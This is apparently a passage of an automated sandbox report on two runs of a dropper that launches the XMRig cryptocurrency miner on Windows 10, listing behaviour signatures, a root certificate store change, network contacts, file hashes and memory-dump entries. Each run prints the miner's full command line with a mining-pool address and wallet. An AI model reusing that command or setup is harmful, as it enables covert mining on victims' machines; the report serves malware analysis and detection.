memory/3568-54-0x00007FF645030000-0x00007FF645B33000-memory.dmp
memory/3568-55-0x00007FF645030000-0x00007FF645B33000-memory.dmp
memory/3568-56-0x00007FF645030000-0x00007FF645B33000-memory.dmp
memory/3568-57-0x00007FF645030000-0x00007FF645B33000-memory.dmp
memory/3568-58-0x00007FF645030000-0x00007FF645B33000-memory.dmp
memory/3568-59-0x00007FF645030000-0x00007FF645B33000-memory.dmp
memory/3568-60-0x00007FF645030000-0x00007FF645B33000-memory.dmp
memory/3568-61-0x00007FF645030000-0x00007FF645B33000-memory.dmp
memory/3568-62-0x00007FF645030000-0x00007FF645B33000-memory.dmp
memory/3568-63-0x00007FF645030000-0x00007FF645B33000-memory.dmp
memory/3568-64-0x00007FF645030000-0x00007FF645B33000-memory.dmp
memory/3568-65-0x00007FF645030000-0x00007FF645B33000-memory.dmp
memory/3568-66-0x00007FF645030000-0x00007FF645B33000-memory.dmp
memory/3568-67-0x00007FF645030000-0x00007FF645B33000-memory.dmp
memory/3568-68-0x00007FF645030000-0x00007FF645B33000-memory.dmp
memory/3568-69-0x00007FF645030000-0x00007FF645B33000-memory.dmp
memory/3568-70-0x00007FF645030000-0x00007FF645B33000-memory.dmp
memory/3568-71-0x00007FF645030000-0x00007FF645B33000-memory.dmp
memory/3568-72-0x00007FF645030000-0x00007FF645B33000-memory.dmp
memory/3568-73-0x00007FF645030000-0x00007FF645B33000-memory.dmp
memory/3568-74-0x00007FF645030000-0x00007FF645B33000-memory.dmp
memory/3568-75-0x00007FF645030000-0x00007FF645B33000-memory.dmp
memory/3568-76-0x00007FF645030000-0x00007FF645B33000-memory.dmp
memory/3568-77-0x00007FF645030000-0x00007FF645B33000-memory.dmp
memory/3568-78-0x00007FF645030000-0x00007FF645B33000-memory.dmp
memory/3568-79-0x00007FF645030000-0x00007FF645B33000-memory.dmp
memory/3568-80-0x00007FF645030000-0x00007FF645B33000-memory.dmp
memory/3568-81-0x00007FF645030000-0x00007FF645B33000-memory.dmp
memory/3568-82-0x00007FF645030000-0x00007FF645B33000-memory.dmp
memory/3568-83-0x00007FF645030000-0x00007FF645B33000-memory.dmp
memory/3568-84-0x00007FF645030000-0x00007FF645B33000-memory.dmp
Analysis: behavioral5
Detonation Overview
Submitted
2024-05-20 15:56
Reported
2024-05-22 15:13
Platform
win10v2004-20240508-en
Max time kernel
1794s
Max time network
1793s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2972 wrote to memory of 1100 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 2972 wrote to memory of 1100 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.173.79.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.251.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| NL | 23.62.61.113:443 | www.bing.com | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 113.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/1100-16-0x000002B6947C0000-0x000002B6947E0000-memory.dmp
memory/1100-17-0x000002B726B80000-0x000002B726BA0000-memory.dmp
memory/1100-18-0x00007FF7D2780000-0x00007FF7D3283000-memory.dmp
memory/1100-20-0x000002B7271F0000-0x000002B727210000-memory.dmp
memory/1100-19-0x000002B7271D0000-0x000002B7271F0000-memory.dmp
memory/1100-21-0x00007FF7D2780000-0x00007FF7D3283000-memory.dmp
memory/1100-22-0x00007FF7D2780000-0x00007FF7D3283000-memory.dmp
memory/1100-25-0x000002B7271F0000-0x000002B727210000-memory.dmp
memory/1100-24-0x000002B7271D0000-0x000002B7271F0000-memory.dmp
memory/1100-23-0x00007FF7D2780000-0x00007FF7D3283000-memory.dmp
memory/1100-26-0x00007FF7D2780000-0x00007FF7D3283000-memory.dmp
memory/1100-27-0x00007FF7D2780000-0x00007FF7D3283000-memory.dmp
memory/1100-28-0x00007FF7D2780000-0x00007FF7D3283000-memory.dmp
memory/1100-29-0x00007FF7D2780000-0x00007FF7D3283000-memory.dmp
memory/1100-30-0x00007FF7D2780000-0x00007FF7D3283000-memory.dmp
memory/1100-31-0x00007FF7D2780000-0x00007FF7D3283000-memory.dmp
memory/1100-32-0x00007FF7D2780000-0x00007FF7D3283000-memory.dmp
memory/1100-33-0x00007FF7D2780000-0x00007FF7D3283000-memory.dmp
memory/1100-34-0x00007FF7D2780000-0x00007FF7D3283000-memory.dmp
memory/1100-35-0x00007FF7D2780000-0x00007FF7D3283000-memory.dmp
memory/1100-36-0x00007FF7D2780000-0x00007FF7D3283000-memory.dmp
memory/1100-37-0x00007FF7D2780000-0x00007FF7D3283000-memory.dmp
memory/1100-38-0x00007FF7D2780000-0x00007FF7D3283000-memory.dmp
memory/1100-39-0x00007FF7D2780000-0x00007FF7D3283000-memory.dmp
memory/1100-40-0x00007FF7D2780000-0x00007FF7D3283000-memory.dmp
memory/1100-41-0x00007FF7D2780000-0x00007FF7D3283000-memory.dmp
memory/1100-42-0x00007FF7D2780000-0x00007FF7D3283000-memory.dmp
memory/1100-43-0x00007FF7D2780000-0x00007FF7D3283000-memory.dmp
memory/1100-44-0x00007FF7D2780000-0x00007FF7D3283000-memory.dmp
memory/1100-45-0x00007FF7D2780000-0x00007FF7D3283000-memory.dmp
memory/1100-46-0x00007FF7D2780000-0x00007FF7D3283000-memory.dmp
memory/1100-47-0x00007FF7D2780000-0x00007FF7D3283000-memory.dmp
memory/1100-48-0x00007FF7D2780000-0x00007FF7D3283000-memory.dmp
memory/1100-49-0x00007FF7D2780000-0x00007FF7D3283000-memory.dmp
memory/1100-50-0x00007FF7D2780000-0x00007FF7D3283000-memory.dmp
memory/1100-51-0x00007FF7D2780000-0x00007FF7D3283000-memory.dmp
memory/1100-52-0x00007FF7D2780000-0x00007FF7D3283000-memory.dmp
memory/1100-53-0x00007FF7D2780000-0x00007FF7D3283000-memory.dmp
memory/1100-54-0x00007FF7D2780000-0x00007FF7D3283000-memory.dmp
memory/1100-55-0x00007FF7D2780000-0x00007FF7D3283000-memory.dmp
memory/1100-56-0x00007FF7D2780000-0x00007FF7D3283000-memory.dmp
memory/1100-57-0x00007FF7D2780000-0x00007FF7D3283000-memory.dmp
memory/1100-58-0x00007FF7D2780000-0x00007FF7D3283000-memory.dmp
memory/1100-59-0x00007FF7D2780000-0x00007FF7D3283000-memory.dmp
memory/1100-60-0x00007FF7D2780000-0x00007FF7D3283000-memory.dmp
memory/1100-61-0x00007FF7D2780000-0x00007FF7D3283000-memory.dmp
memory/1100-62-0x00007FF7D2780000-0x00007FF7D3283000-memory.dmp
memory/1100-63-0x00007FF7D2780000-0x00007FF7D3283000-memory.dmp
memory/1100-64-0x00007FF7D2780000-0x00007FF7D3283000-memory.dmp
memory/1100-65-0x00007FF7D2780000-0x00007FF7D3283000-memory.dmp
memory/1100-66-0x00007FF7D2780000-0x00007FF7D3283000-memory.dmp
memory/1100-67-0x00007FF7D2780000-0x00007FF7D3283000-memory.dmp
memory/1100-68-0x00007FF7D2780000-0x00007FF7D3283000-memory.dmp
memory/1100-69-0x00007FF7D2780000-0x00007FF7D3283000-memory.dmp
memory/1100-70-0x00007FF7D2780000-0x00007FF7D3283000-memory.dmp
memory/1100-71-0x00007FF7D2780000-0x00007FF7D3283000-memory.dmp
memory/1100-72-0x00007FF7D2780000-0x00007FF7D3283000-memory.dmp
memory/1100-73-0x00007FF7D2780000-0x00007FF7D3283000-memory.dmp
memory/1100-74-0x00007FF7D2780000-0x00007FF7D3283000-memory.dmp
memory/1100-75-0x00007FF7D2780000-0x00007FF7D3283000-memory.dmp
memory/1100-76-0x00007FF7D2780000-0x00007FF7D3283000-memory.dmp
memory/1100-77-0x00007FF7D2780000-0x00007FF7D3283000-memory.dmp
memory/1100-78-0x00007FF7D2780000-0x00007FF7D3283000-memory.dmp
memory/1100-79-0x00007FF7D2780000-0x00007FF7D3283000-memory.dmp
memory/1100-80-0x00007FF7D2780000-0x00007FF7D3283000-memory.dmp
memory/1100-81-0x00007FF7D2780000-0x00007FF7D3283000-memory.dmp
memory/1100-82-0x00007FF7D2780000-0x00007FF7D3283000-memory.dmp
memory/1100-83-0x00007FF7D2780000-0x00007FF7D3283000-memory.dmp
memory/1100-84-0x00007FF7D2780000-0x00007FF7D3283000-memory.dmp
Analysis: behavioral12
Detonation Overview
Submitted
2024-05-20 15:56
Reported
2024-05-22 18:29
Platform
win10v2004-20240508-en
Max time kernel
1793s
Max time network
1799s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4664 wrote to memory of 4684 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 4664 wrote to memory of 4684 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.31.126.40.in-addr.arpa | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.65.42.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/4684-16-0x000001664C7D0000-0x000001664C7F0000-memory.dmp
memory/4684-17-0x000001664E0D0000-0x000001664E0F0000-memory.dmp
memory/4684-18-0x00007FF6E5780000-0x00007FF6E6283000-memory.dmp
memory/4684-20-0x000001664E0F0000-0x000001664E110000-memory.dmp
memory/4684-19-0x000001664E110000-0x000001664E130000-memory.dmp
memory/4684-21-0x00007FF6E5780000-0x00007FF6E6283000-memory.dmp
memory/4684-22-0x00007FF6E5780000-0x00007FF6E6283000-memory.dmp
memory/4684-25-0x000001664E0F0000-0x000001664E110000-memory.dmp
memory/4684-24-0x000001664E110000-0x000001664E130000-memory.dmp
memory/4684-23-0x00007FF6E5780000-0x00007FF6E6283000-memory.dmp
memory/4684-26-0x00007FF6E5780000-0x00007FF6E6283000-memory.dmp
memory/4684-27-0x00007FF6E5780000-0x00007FF6E6283000-memory.dmp
memory/4684-28-0x00007FF6E5780000-0x00007FF6E6283000-memory.dmp
memory/4684-29-0x00007FF6E5780000-0x00007FF6E6283000-memory.dmp
memory/4684-30-0x00007FF6E5780000-0x00007FF6E6283000-memory.dmp
memory/4684-31-0x00007FF6E5780000-0x00007FF6E6283000-memory.dmp
memory/4684-32-0x00007FF6E5780000-0x00007FF6E6283000-memory.dmp
memory/4684-33-0x00007FF6E5780000-0x00007FF6E6283000-memory.dmp
memory/4684-34-0x00007FF6E5780000-0x00007FF6E6283000-memory.dmp
memory/4684-35-0x00007FF6E5780000-0x00007FF6E6283000-memory.dmp
memory/4684-36-0x00007FF6E5780000-0x00007FF6E6283000-memory.dmp
memory/4684-37-0x00007FF6E5780000-0x00007FF6E6283000-memory.dmp
memory/4684-38-0x00007FF6E5780000-0x00007FF6E6283000-memory.dmp
memory/4684-39-0x00007FF6E5780000-0x00007FF6E6283000-memory.dmp
memory/4684-40-0x00007FF6E5780000-0x00007FF6E6283000-memory.dmp
memory/4684-41-0x00007FF6E5780000-0x00007FF6E6283000-memory.dmp
